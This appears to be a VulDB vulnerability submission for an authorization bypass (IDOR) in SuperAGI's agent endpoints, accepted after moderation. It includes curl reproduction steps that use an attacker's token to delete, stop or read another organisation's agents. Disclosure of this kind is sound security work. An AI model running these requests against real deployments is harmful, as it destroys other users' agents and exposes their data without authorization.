Submit #791081: SuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)info

TitelSuperAGI up to c3c1982 Authorization Bypass Through User-Controlled Key (CWE-639)
Beschreibung# Technical Details An Insecure Direct Object Reference (IDOR) exists in the `delete_agent`, `stop_schedule`, and `get_schedule_data` methods in `superagi/controllers/agent.py` of SuperAGI. The application fails to verify that the target agent belongs to the requesting user's organization. All three endpoints only validate the JWT token via `Depends(check_auth)` but perform no ownership check on the `agent_id` parameter. # Vulnerable Code File: superagi/controllers/agent.py Method: delete_agent (lines 383-420), stop_schedule (lines 238-256), get_schedule_data (lines 289-329) Why: The `delete_agent` endpoint queries `Agent.id == agent_id` without any org check, then marks the agent as deleted, terminates all its running executions, and stops any scheduled runs — affecting the victim's resources entirely. # Reproduction 1. Authenticate with an attacker account and obtain a valid JWT. 2. Delete victim's agent (soft delete + terminates all executions): curl -s -X PUT -H "Authorization: Bearer $JWT" "http://localhost:3000/api/agents/delete/1" 3. Stop victim's scheduled agent: curl -s -X POST -H "Authorization: Bearer $JWT" -H "Content-Type: application/json" "http://localhost:3000/api/agents/stop/schedule" -d '{"agent_id": 1}' 4. Read victim's agent schedule data: curl -s -H "Authorization: Bearer $JWT" "http://localhost:3000/api/agents/get/schedule_data/1" # Impact - Data Destruction: Deleting agents terminates all their executions and stops all schedules. - Service Disruption: Victim's automated agent pipelines are immediately stopped. - Information Disclosure: Agent schedule configurations (cron expressions, start times) are exposed.
Quelle⚠️ https://gist.github.com/YLChen-007/1d87985b274ce22c4294726d7758df8e
Benutzer
 Eric-z (UID 95890)
Einreichung27.03.2026 13:00 (vor 25 Tagen)
Moderieren19.04.2026 18:13 (23 days later)
StatusAkzeptiert
VulDB Eintrag358248 [TransformerOptimus SuperAGI bis 0.0.14 agent.py delete_agent/stop_schedule/get_schedule_data agent_id erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!